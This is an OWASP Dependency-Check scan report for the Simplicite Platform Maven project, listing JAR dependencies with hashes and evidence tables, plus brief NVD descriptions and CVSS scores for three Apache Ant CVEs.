Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies;
false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and
the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties,
implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided
is at the user’s risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever
arising out of or in connection with the use of this tool, the analysis performed, or the resulting report.
Scan Information (
show all ):
dependency-check version : 7.4.3Report Generated On : Mon, 15 Jan 2024 11:28:27 +0100Dependencies Scanned : 357 (314 unique)Vulnerable Dependencies : 70 Vulnerabilities Found : 247Vulnerabilities Suppressed : 0... NVD CVE Checked : 2024-01-15T11:26:54NVD CVE Modified : 2024-01-15T07:00:01VersionCheckOn : 2024-01-09T17:35:29kev.checked : 1705093300Summary Display:
Showing Vulnerable Dependencies (click to show all) Dependencies FastInfoset-1.2.16.jarDescription:
Open Source implementation of the Fast Infoset Standard for Binary XML (http://www.itu.int/ITU-T/asn1/). License:
http://www.opensource.org/licenses/apache2.0.php, http://www.eclipse.org/org/documents/edl-v10.php File Path: /var/simplicite/.m2/repository/com/sun/xml/fastinfoset/FastInfoset/1.2.16/FastInfoset-1.2.16.jar
MD5: f7f4be4695e2501a6d585beca305c74c
SHA1: 4eb6a0adad553bf759ffe86927df6f3b848c8bea
SHA256: 056f3a1e144409f21ed16afc26805f58e9a21f3fce1543c42d400719d250c511
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name FastInfoset High Vendor jar package name fastinfoset Highest Vendor jar package name sun Highest Vendor jar package name xml Highest Vendor jar (hint) package name oracle Highest Vendor Manifest bundle-docurl https://www.eclipse.org Low Vendor Manifest bundle-symbolicname com.sun.xml.fastinfoset.FastInfoset Medium Vendor Manifest extension-name com.sun.xml.fastinfoset Medium Vendor Manifest implementation-build-id 1.2.16-df8b153, 2018-12-27T14:31:11+0000 Low Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest Implementation-Vendor-Id com.sun.xml.fastinfoset Medium Vendor pom artifactid FastInfoset Highest Vendor pom artifactid FastInfoset Low Vendor pom groupid com.sun.xml.fastinfoset Highest Vendor pom name fastinfoset High Vendor pom parent-artifactid fastinfoset-project Low Product file name FastInfoset High Product jar package name fastinfoset Highest Product jar package name org Highest Product jar package name sun Highest Product jar package name xml Highest Product Manifest bundle-docurl https://www.eclipse.org Low Product Manifest Bundle-Name fastinfoset Medium Product Manifest bundle-symbolicname com.sun.xml.fastinfoset.FastInfoset Medium Product Manifest extension-name com.sun.xml.fastinfoset Medium Product Manifest implementation-build-id 1.2.16-df8b153, 2018-12-27T14:31:11+0000 Low Product Manifest Implementation-Title Fast Infoset Implementation High Product Manifest specification-title ITU-T Rec. X.891 | ISO/IEC 24824-1 (Fast Infoset) Medium Product pom artifactid FastInfoset Highest Product pom groupid com.sun.xml.fastinfoset Highest Product pom name fastinfoset High Product pom parent-artifactid fastinfoset-project Medium Version file version 1.2.16 High Version Manifest Bundle-Version 1.2.16 High Version Manifest Implementation-Version 1.2.16 High Version pom version 1.2.16 Highest
HikariCP-3.4.0.jarDescription:
Ultimate JDBC Connection Pool License:
The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/zaxxer/HikariCP/3.4.0/HikariCP-3.4.0.jar
MD5: 60549ba87bf28ce69702302b62e527c5
SHA1: 6ce7ce51bd472b93a26bd26b41ad18e9b842ad41
SHA256: 0bd769d01a0e64b1a61053206343364ec6bde30b84d819c29de163bcfb485852
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name HikariCP High Vendor jar package name hikari Highest Vendor jar package name pool Highest Vendor jar package name zaxxer Highest Vendor Manifest automatic-module-name com.zaxxer.hikari Medium Vendor Manifest bundle-docurl https://github.com/brettwooldridge Low Vendor Manifest bundle-symbolicname com.zaxxer.HikariCP Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor pom artifactid HikariCP Highest Vendor pom artifactid HikariCP Low Vendor pom developer email brett.wooldridge@gmail.com Low Vendor pom developer name Brett Wooldridge Medium Vendor pom groupid com.zaxxer Highest Vendor pom name HikariCP High Vendor pom organization name Zaxxer.com High Vendor pom organization url brettwooldridge Medium Vendor pom url brettwooldridge/HikariCP Highest Product file name HikariCP High Product jar package name hikari Highest Product jar package name pool Highest Product jar package name zaxxer Highest Product Manifest automatic-module-name com.zaxxer.hikari Medium Product Manifest bundle-docurl https://github.com/brettwooldridge Low Product Manifest Bundle-Name HikariCP Medium Product Manifest bundle-symbolicname com.zaxxer.HikariCP Medium Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product pom artifactid HikariCP Highest Product pom developer email brett.wooldridge@gmail.com Low Product pom developer name Brett Wooldridge Low Product pom groupid com.zaxxer Highest Product pom name HikariCP High Product pom organization name Zaxxer.com Low Product pom url brettwooldridge High Product pom url brettwooldridge/HikariCP High Version file version 3.4.0 High Version Manifest Bundle-Version 3.4.0 High Version pom version 3.4.0 Highest
JavaEWAH-1.1.6.jarDescription:
The bit array data structure is implemented in Java as the BitSet class. Unfortunately, this fails to scale without compression.
JavaEWAH is a word-aligned compressed variant of the Java bitset class. It uses a 64-bit run-length encoding (RLE) compression scheme.
The goal of word-aligned compression is not to achieve the best compression, but rather to improve query processing time. Hence, we try to save CPU cycles, maybe at the expense of storage. However, the EWAH scheme we implemented is always more efficient storage-wise than an uncompressed bitmap (implemented in Java as the BitSet class). Unlike some alternatives, javaewah does not rely on a patented scheme. License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/com/googlecode/javaewah/JavaEWAH/1.1.6/JavaEWAH-1.1.6.jar
MD5: ad90237fa8e47defd9fdac73e68608fd
SHA1: 94ad16d728b374d65bd897625f3fbb3da223a2b6
SHA256: f78d44a1e3877f1ce748b4a85df5171e5e8e9a5c3c6f63bb9003db6f84cce952
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name JavaEWAH High Vendor jar package name bitset Highest Vendor jar package name googlecode Highest Vendor jar package name javaewah Highest Vendor Manifest bundle-symbolicname com.googlecode.javaewah.JavaEWAH Medium Vendor pom artifactid JavaEWAH Highest Vendor pom artifactid JavaEWAH Low Vendor pom developer email lemire@gmail.com Low Vendor pom developer id lemire Medium Vendor pom developer name Daniel Lemire Medium Vendor pom developer org LICEF Research Center Medium Vendor pom developer org URL http://licef.ca Medium Vendor pom groupid com.googlecode.javaewah Highest Vendor pom name JavaEWAH High Vendor pom url lemire/javaewah Highest Product file name JavaEWAH High Product jar package name bitset Highest Product jar package name googlecode Highest Product jar package name javaewah Highest Product Manifest Bundle-Name JavaEWAH Medium Product Manifest bundle-symbolicname com.googlecode.javaewah.JavaEWAH Medium Product pom artifactid JavaEWAH Highest Product pom developer email lemire@gmail.com Low Product pom developer id lemire Low Product pom developer name Daniel Lemire Low Product pom developer org LICEF Research Center Low Product pom developer org URL http://licef.ca Low Product pom groupid com.googlecode.javaewah Highest Product pom name JavaEWAH High Product pom url lemire/javaewah High Version file version 1.1.6 High Version Manifest Bundle-Version 1.1.6 High Version pom version 1.1.6 Highest
activation-1.1.jarDescription:
JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).
License:
Common Development and Distribution License (CDDL) v1.0: https://glassfish.dev.java.net/public/CDDLv1.0.html File Path: /var/simplicite/.m2/repository/javax/activation/activation/1.1/activation-1.1.jar
MD5: 8ae38e87cd4f86059c0294a8fe3e0b18
SHA1: e6cb541461c2834bdea3eb920f1884d1eb508b50
SHA256: 2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name activation High Vendor jar package name activation Highest Vendor jar package name javax Highest Vendor jar package name sun Highest Vendor jar (hint) package name oracle Highest Vendor Manifest extension-name javax.activation Medium Vendor Manifest Implementation-Vendor Sun Microsystems, Inc. High Vendor Manifest Implementation-Vendor-Id com.sun Medium Vendor Manifest specification-vendor Sun Microsystems, Inc. Low Vendor pom artifactid activation Highest Vendor pom artifactid activation Low Vendor pom groupid javax.activation Highest Vendor pom name JavaBeans Activation Framework (JAF) High Vendor pom url http://java.sun.com/products/javabeans/jaf/index.jsp Highest Product file name activation High Product jar package name activation Highest Product jar package name javax Highest Product Manifest extension-name javax.activation Medium Product Manifest specification-title JavaBeans(TM) Activation Framework Specification Medium Product pom artifactid activation Highest Product pom groupid javax.activation Highest Product pom name JavaBeans Activation Framework (JAF) High Product pom url http://java.sun.com/products/javabeans/jaf/index.jsp Medium Version file version 1.1 High Version Manifest Implementation-Version 1.1 High Version pom version 1.1 Highest
animal-sniffer-annotations-1.18.jarFile Path: /var/simplicite/.m2/repository/org/codehaus/mojo/animal-sniffer-annotations/1.18/animal-sniffer-annotations-1.18.jarMD5: f0a84f9b30590b3aa76edc893d6fe4ffSHA1: f7aa683ea79dc6681ee9fb95756c999acbb62f5dSHA256: 47f05852b48ee9baefef80fa3d8cea60efa4753c0013121dd7fe5eef2e5c729dReferenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name animal-sniffer-annotations High Vendor jar package name animal_sniffer Low Vendor jar package name codehaus Highest Vendor jar package name codehaus Low Vendor jar package name mojo Highest Vendor jar package name mojo Low Vendor pom artifactid animal-sniffer-annotations Highest Vendor pom artifactid animal-sniffer-annotations Low Vendor pom groupid org.codehaus.mojo Highest Vendor pom name Animal Sniffer Annotations High Vendor pom parent-artifactid animal-sniffer-parent Low Product file name animal-sniffer-annotations High Product jar package name animal_sniffer Low Product jar package name codehaus Highest Product jar package name ignorejrerequirement Low Product jar package name mojo Highest Product jar package name mojo Low Product pom artifactid animal-sniffer-annotations Highest Product pom groupid org.codehaus.mojo Highest Product pom name Animal Sniffer Annotations High Product pom parent-artifactid animal-sniffer-parent Medium Version file version 1.18 High Version pom version 1.18 Highest
annotations-4.1.1.4.jarDescription:
A library jar that provides annotations for the Google Android Platform. License:
Apache 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /var/simplicite/.m2/repository/com/google/android/annotations/4.1.1.4/annotations-4.1.1.4.jar
MD5: c2cdd26a6ae577f24775e8ce75da1fdc
SHA1: a1678ba907bf92691d879fef34e1a187038f9259
SHA256: ba734e1e84c09d615af6a09d33034b4f0442f8772dec120efb376d86a565ae15
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name annotations High Vendor jar package name android Highest Vendor jar package name android Low Vendor jar package name annotation Low Vendor pom artifactid annotations Highest Vendor pom artifactid annotations Low Vendor pom developer name The Android Open Source Projects Medium Vendor pom groupid com.google.android Highest Vendor pom name Google Android Annotations Library High Vendor pom url http://source.android.com/ Highest Product file name annotations High Product jar package name android Highest Product jar package name annotation Low Product pom artifactid annotations Highest Product pom developer name The Android Open Source Projects Low Product pom groupid com.google.android Highest Product pom name Google Android Annotations Library High Product pom url http://source.android.com/ Medium Version file version 4.1.1.4 High Version pom version 4.1.1.4 Highest
ant-1.10.7.jarFile Path: /var/simplicite/.m2/repository/org/apache/ant/ant/1.10.7/ant-1.10.7.jarMD5: 66386ce040556ca4836fe829d0f1b293SHA1: ebd23eb1f451de96e9a616f239408db88eedc1c2SHA256: dab4d3b2e45b73aec95cb25ce5050a651ad060f50f74662bbc3c1cb406ec1d19Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name ant High Vendor jar package name ant Highest Vendor jar package name apache Highest Vendor manifest: org/apache/tools/ant/ Implementation-Vendor Apache Software Foundation Medium Vendor pom artifactid ant Highest Vendor pom artifactid ant Low Vendor pom groupid org.apache.ant Highest Vendor pom name Apache Ant Core High Vendor pom parent-artifactid ant-parent Low Vendor pom url https://ant.apache.org/ Highest Product file name ant High Product jar package name ant Highest Product jar package name apache Highest Product jar package name tools Highest Product manifest: org/apache/tools/ant/ Implementation-Title org.apache.tools.ant Medium Product manifest: org/apache/tools/ant/ Specification-Title Apache Ant Medium Product pom artifactid ant Highest Product pom groupid org.apache.ant Highest Product pom name Apache Ant Core High Product pom parent-artifactid ant-parent Medium Product pom url https://ant.apache.org/ Medium Version file version 1.10.7 High Version manifest: org/apache/tools/ant/ Implementation-Version 1.10.7 Medium Version pom version 1.10.7 Highest
Related Dependencies ant-launcher-1.10.7.jarFile Path: /var/simplicite/.m2/repository/org/apache/ant/ant-launcher/1.10.7/ant-launcher-1.10.7.jar MD5: 68e4ba132f8168520087c3d89ca87b2a SHA1: 43118ac1a5c01a9aa53117743b3d10d254547661 SHA256: 749d131ab53fd292041245bf24e4b6a6241766f17a5b987a4e4d833cd4234ae6 pkg:maven/org.apache.ant/ant-launcher@1.10.7 CVE-2020-1945 suppress
Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process. CWE-668 Exposure of Resource to Wrong Sphere
CVSSv2:
Base Score: LOW (3.3) Vector: /AV:L/AC:M/Au:N/C:P/I:P/A:N CVSSv3:
Base Score: MEDIUM (6.3) Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2021-36373 suppress
When reading a specially crafted TAR archive an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant prior to 1.9.16 and 1.10.11 were affected. NVD-CWE-Other
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
CVE-2021-36374 suppress
When reading a specially crafted ZIP archive, or a derived formats, an Apache Ant build can be made to allocate large amounts of memory that leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Commonly used derived formats from ZIP archives are for instance JAR files and many office files. Apache Ant prior to 1.9.16 and 1.10.11 were affected. NVD-CWE-Other
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions: (show all )
antlr-2.7.7.jarDescription:
A framework for constructing recognizers, compilers,
and translators from grammatical descriptions containing
Java, C#, C++, or Python actions.
License:
BSD License: http://www.antlr.org/license.html File Path: /var/simplicite/.m2/repository/antlr/antlr/2.7.7/antlr-2.7.7.jar
MD5: f8f1352c52a4c6a500b597596501fc64
SHA1: 83cd2cd674a217ade95a4bb83a8a14f351f48bd0
SHA256: 88fbda4b912596b9f56e8e12e580cc954bacfb51776ecfddd3e18fc1cf56dc4c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name antlr High Vendor jar package name actions Highest Vendor jar package name antlr Highest Vendor jar package name antlr Low Vendor jar package name java Highest Vendor jar package name parser Highest Vendor jar package name python Highest Vendor pom artifactid antlr Highest Vendor pom artifactid antlr Low Vendor pom groupid antlr Highest Vendor pom name AntLR Parser Generator High Vendor pom url http://www.antlr.org/ Highest Product file name antlr High Product jar package name actions Highest Product jar package name antlr Highest Product jar package name java Highest Product jar package name parser Highest Product jar package name python Highest Product pom artifactid antlr Highest Product pom groupid antlr Highest Product pom name AntLR Parser Generator High Product pom url http://www.antlr.org/ Medium Version file version 2.7.7 High Version pom version 2.7.7 Highest
antlr-runtime-3.5.2.jarDescription:
A framework for constructing recognizers, compilers, and translators from grammatical descriptions containing Java, C#, C++, or Python actions. File Path: /var/simplicite/.m2/repository/org/antlr/antlr-runtime/3.5.2/antlr-runtime-3.5.2.jarMD5: 1fbbae2cb72530207c20b797bdabd029SHA1: cd9cd41361c155f3af0f653009dcecb08d8b4afdSHA256: ce3fc8ecb10f39e9a3cddcbb2ce350d272d9cd3d0b1e18e6fe73c3b9389c8734Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name antlr-runtime High Vendor jar package name antlr Highest Vendor jar package name runtime Highest Vendor Manifest Implementation-Vendor ANTLR High Vendor Manifest Implementation-Vendor-Id org.antlr Medium Vendor pom artifactid antlr-runtime Highest Vendor pom artifactid antlr-runtime Low Vendor pom developer email jimi@temporal-wave.com Low Vendor pom developer email parrt@antlr.org Low Vendor pom developer name Jim Idle Medium Vendor pom developer name Terence Parr Medium Vendor pom developer org Temporal Wave LLC Medium Vendor pom developer org USFCA Medium Vendor pom developer org URL http://www.cs.usfca.edu Medium Vendor pom developer org URL http://www.temporal-wave.com Medium Vendor pom groupid org.antlr Highest Vendor pom name ANTLR 3 Runtime High Vendor pom parent-artifactid antlr-master Low Vendor pom url http://www.antlr.org Highest Product file name antlr-runtime High Product jar package name antlr Highest Product jar package name runtime Highest Product Manifest Implementation-Title ANTLR 3 Runtime High Product pom artifactid antlr-runtime Highest Product pom developer email jimi@temporal-wave.com Low Product pom developer email parrt@antlr.org Low Product pom developer name Jim Idle Low Product pom developer name Terence Parr Low Product pom developer org Temporal Wave LLC Low Product pom developer org USFCA Low Product pom developer org URL http://www.cs.usfca.edu Low Product pom developer org URL http://www.temporal-wave.com Low Product pom groupid org.antlr Highest Product pom name ANTLR 3 Runtime High Product pom parent-artifactid antlr-master Medium Product pom url http://www.antlr.org Medium Version file version 3.5.2 High Version Manifest Implementation-Version 3.5.2 High Version pom version 3.5.2 Highest
aopalliance-1.0.jarDescription:
AOP Alliance License:
Public Domain File Path: /var/simplicite/.m2/repository/aopalliance/aopalliance/1.0/aopalliance-1.0.jar
MD5: 04177054e180d09e3998808efa0401c7
SHA1: 0235ba8b489512805ac13a8f9ea77a1ca5ebe3e8
SHA256: 0addec670fedcd3f113c5c8091d783280d23f75e3acb841b61a9cdb079376a08
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name aopalliance High Vendor jar package name aop Highest Vendor jar package name aopalliance Highest Vendor jar package name aopalliance Low Vendor jar package name intercept Low Vendor pom artifactid aopalliance Highest Vendor pom artifactid aopalliance Low Vendor pom groupid aopalliance Highest Vendor pom name AOP alliance High Vendor pom url http://aopalliance.sourceforge.net Highest Product file name aopalliance High Product jar package name aop Highest Product jar package name aopalliance Highest Product jar package name intercept Low Product pom artifactid aopalliance Highest Product pom groupid aopalliance Highest Product pom name AOP alliance High Product pom url http://aopalliance.sourceforge.net Medium Version file version 1.0 High Version pom version 1.0 Highest
apache-mime4j-core-0.8.3.jarDescription:
Java stream based MIME message parser License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/james/apache-mime4j-core/0.8.3/apache-mime4j-core-0.8.3.jar
MD5: dc03793d8d9e208f4a21a36b78f922f0
SHA1: 1179b56c9919c1a8e20d3a528ee4c6cee19bcbe0
SHA256: 910002bd8d2fc413220386cd656a33b32f0007850dd53c2c0f30f90801eba6c6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name apache-mime4j-core High Vendor jar package name apache Highest Vendor jar package name james Highest Vendor jar package name mime4j Highest Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.james.apache-mime4j-core Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.james Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid apache-mime4j-core Highest Vendor pom artifactid apache-mime4j-core Low Vendor pom groupid org.apache.james Highest Vendor pom name Apache James :: Mime4j :: Core High Vendor pom parent-artifactid apache-mime4j-project Low Product file name apache-mime4j-core High Product jar package name apache Highest Product jar package name james Highest Product jar package name mime4j Highest Product jar package name parser Highest Product jar package name stream Highest Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache James :: Mime4j :: Core Medium Product Manifest bundle-symbolicname org.apache.james.apache-mime4j-core Medium Product Manifest Implementation-Title Apache James :: Mime4j :: Core High Product Manifest specification-title Apache James :: Mime4j :: Core Medium Product pom artifactid apache-mime4j-core Highest Product pom groupid org.apache.james Highest Product pom name Apache James :: Mime4j :: Core High Product pom parent-artifactid apache-mime4j-project Medium Version file version 0.8.3 High Version Manifest Bundle-Version 0.8.3 High Version Manifest Implementation-Version 0.8.3 High Version pom version 0.8.3 Highest
apache-mime4j-dom-0.8.3.jarDescription:
Java MIME Document Object Model License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /var/simplicite/.m2/repository/org/apache/james/apache-mime4j-dom/0.8.3/apache-mime4j-dom-0.8.3.jar
MD5: 13a1a7be7b85c9b03f6cba68e72d83c2
SHA1: e80733714eb6a70895bfc74a9528c658504c2c83
SHA256: b7f85517887b268d94fd16b13267d9e37a151440eff8acefab3a29ef30977435
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name apache-mime4j-dom High Vendor jar package name apache Highest Vendor jar package name dom Highest Vendor jar package name james Highest Vendor jar package name mime4j Highest Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.james.apache-mime4j-dom Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.james Medium Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid apache-mime4j-dom Highest Vendor pom artifactid apache-mime4j-dom Low Vendor pom groupid org.apache.james Highest Vendor pom name Apache James :: Mime4j :: DOM High Vendor pom parent-artifactid apache-mime4j-project Low Product file name apache-mime4j-dom High Product jar package name apache Highest Product jar package name dom Highest Product jar package name james Highest Product jar package name mime4j Highest Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache James :: Mime4j :: DOM Medium Product Manifest bundle-symbolicname org.apache.james.apache-mime4j-dom Medium Product Manifest Implementation-Title Apache James :: Mime4j :: DOM High Product Manifest specification-title Apache James :: Mime4j :: DOM Medium Product pom artifactid apache-mime4j-dom Highest Product pom groupid org.apache.james Highest Product pom name Apache James :: Mime4j :: DOM High Product pom parent-artifactid apache-mime4j-project Medium Version file version 0.8.3 High Version Manifest Bundle-Version 0.8.3 High Version Manifest Implementation-Version 0.8.3 High Version pom version 0.8.3 Highest
api-common-1.8.1.jarDescription:
Common utilities for Google APIs in Java License:
BSD: https://github.com/googleapis/api-common-java/blob/master/LICENSE File Path: /var/simplicite/.m2/repository/com/google/api/api-common/1.8.1/api-common-1.8.1.jar
MD5: 839b9b829ff6a7172d640b33fbc2e1b3
SHA1: e89befb19b08ad84b262b2f226ab79aefcaa9d7f
SHA256: 9840ed24fce0a96492e671853077be62edab802b6760e3b327362d6949943674
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name api-common High Vendor jar package name api Highest Vendor jar package name google Highest Vendor Manifest automatic-module-name com.google.api.apicommon Medium Vendor pom artifactid api-common Highest Vendor pom artifactid api-common Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org org.apache.maven.model.Organization@41a186d9 Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api Highest Vendor pom name API Common High Vendor pom url googleapis/api-common-java Highest Product file name api-common High Product jar package name api Highest Product jar package name google Highest Product Manifest automatic-module-name com.google.api.apicommon Medium Product pom artifactid api-common Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org org.apache.maven.model.Organization@41a186d9 Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api Highest Product pom name API Common High Product pom url googleapis/api-common-java High Version file version 1.8.1 High Version pom version 1.8.1 Highest
asm-7.2-beta.jarDescription:
ASM, a very small and fast Java bytecode manipulation framework License:
BSD: http://asm.ow2.org/license.html File Path: /var/simplicite/.m2/repository/org/ow2/asm/asm/7.2-beta/asm-7.2-beta.jar
MD5: 11be68755323a89d5d9cf33ee306416a
SHA1: 42e26c6613fc9cb3002b55897802ab605c92dc44
SHA256: 00acf26a20b0c032b3d19ea0fbc079d6694b56de46e018ecf90e68cb7dd5caa2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name asm High Vendor jar package name asm Highest Vendor jar package name objectweb Highest Vendor Manifest bundle-docurl http://asm.ow2.org Low Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname org.objectweb.asm Medium Vendor pom artifactid asm Highest Vendor pom artifactid asm Low Vendor pom developer email ebruneton@free.fr Low Vendor pom developer email eu@javatx.org Low Vendor pom developer email forax@univ-mlv.fr Low Vendor pom developer id ebruneton Medium Vendor pom developer id eu Medium Vendor pom developer id forax Medium Vendor pom developer name Eric Bruneton Medium Vendor pom developer name Eugene Kuleshov Medium Vendor pom developer name Remi Forax Medium Vendor pom groupid org.ow2.asm Highest Vendor pom name asm High Vendor pom organization name OW2 High Vendor pom organization url http://www.ow2.org/ Medium Vendor pom parent-artifactid ow2 Low Vendor pom parent-groupid org.ow2 Medium Vendor pom url http://asm.ow2.org/ Highest Product file name asm High Product jar package name asm Highest Product jar package name objectweb Highest Product Manifest bundle-docurl http://asm.ow2.org Low Product Manifest Bundle-Name org.objectweb.asm Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname org.objectweb.asm Medium Product Manifest Implementation-Title ASM, a very small and fast Java bytecode manipulation framework High Product pom artifactid asm Highest Product pom developer email ebruneton@free.fr Low Product pom developer email eu@javatx.org Low Product pom developer email forax@univ-mlv.fr Low Product pom developer id ebruneton Low Product pom developer id eu Low Product pom developer id forax Low Product pom developer name Eric Bruneton Low Product pom developer name Eugene Kuleshov Low Product pom developer name Remi Forax Low Product pom groupid org.ow2.asm Highest Product pom name asm High Product pom organization name OW2 Low Product pom organization url http://www.ow2.org/ Low Product pom parent-artifactid ow2 Medium Product pom parent-groupid org.ow2 Medium Product pom url http://asm.ow2.org/ Medium Version Manifest Implementation-Version 7.2-beta High Version pom parent-version 7.2-beta Low Version pom version 7.2-beta Highest
auto-value-annotations-1.6.6.jarDescription:
Immutable value-type code generation for Java 1.6+.
File Path: /var/simplicite/.m2/repository/com/google/auto/value/auto-value-annotations/1.6.6/auto-value-annotations-1.6.6.jarMD5: fc2c981dc803b953b9b45ace05a98d8fSHA1: 9947ae63d8ec42ea159283baf2e5b9c0ff100909SHA256: 3bf4b9e74a6bf0f38ac70af571e0f8a9d85ccba4c0693a72fea9ea46def0d5a0Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name auto-value-annotations High Vendor jar package name auto Highest Vendor jar package name auto Low Vendor jar package name autovalue Highest Vendor jar package name google Highest Vendor jar package name google Low Vendor jar package name value Highest Vendor jar package name value Low Vendor pom artifactid auto-value-annotations Highest Vendor pom artifactid auto-value-annotations Low Vendor pom groupid com.google.auto.value Highest Vendor pom name AutoValue Annotations High Vendor pom parent-artifactid auto-value-parent Low Vendor pom url google/auto/tree/master/value Highest Product file name auto-value-annotations High Product jar package name auto Highest Product jar package name auto Low Product jar package name autovalue Highest Product jar package name google Highest Product jar package name value Highest Product jar package name value Low Product pom artifactid auto-value-annotations Highest Product pom groupid com.google.auto.value Highest Product pom name AutoValue Annotations High Product pom parent-artifactid auto-value-parent Medium Product pom url google/auto/tree/master/value High Version file version 1.6.6 High Version pom version 1.6.6 Highest
autolink-0.10.0.jarDescription:
Java library to extract links (URLs, email addresses) from plain text;
fast, small and smart about recognizing where links end
License:
MIT License: http://www.opensource.org/licenses/mit-license.php File Path: /var/simplicite/.m2/repository/org/nibor/autolink/autolink/0.10.0/autolink-0.10.0.jar
MD5: be771f6d4d82b9098596afa30b4f48ea
SHA1: 6579ea7079be461e5ffa99f33222a632711cc671
SHA256: 302b30160968415ee6cd1907987138c7575a6315f9b6ef13b9fe3abc87367857
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name autolink High Vendor jar package name autolink Highest Vendor jar package name nibor Highest Vendor Manifest automatic-module-name org.nibor.autolink Medium Vendor pom artifactid autolink Highest Vendor pom artifactid autolink Low Vendor pom developer email robin@nibor.org Low Vendor pom developer name Robin Stocker Medium Vendor pom groupid org.nibor.autolink Highest Vendor pom name autolink-java High Vendor pom url robinst/autolink-java Highest Product file name autolink High Product jar package name autolink Highest Product jar package name nibor Highest Product Manifest automatic-module-name org.nibor.autolink Medium Product pom artifactid autolink Highest Product pom developer email robin@nibor.org Low Product pom developer name Robin Stocker Low Product pom groupid org.nibor.autolink Highest Product pom name autolink-java High Product pom url robinst/autolink-java High Version file version 0.10.0 High Version pom version 0.10.0 Highest
